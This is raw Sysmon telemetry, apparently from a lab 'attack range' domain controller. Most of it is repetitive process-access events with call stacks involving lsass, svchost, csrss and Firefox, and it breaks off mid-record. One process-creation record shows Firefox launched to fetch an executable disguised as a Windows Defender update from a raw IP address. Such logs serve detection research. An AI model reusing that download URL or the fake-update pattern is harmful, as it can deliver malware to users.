12:23:00.195{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-E4A2-63C7-4806-00000000AF02}32407044C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1b8f|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.200{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3240.6.1286580944\241000202" -childID 5 -isForBrowser -prefsHandle 4460 -prefMapHandle 4456 -prefsLen 31523 -prefMapSize 234522 -jsInitHandle 1108 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a32d0c7b-b52a-4a0c-bcee-233495f7133c} 3240 "\\.\pipe\gecko-crash-server-pipe.3240" 4436 1d97a0cb958 tabC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000043739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla 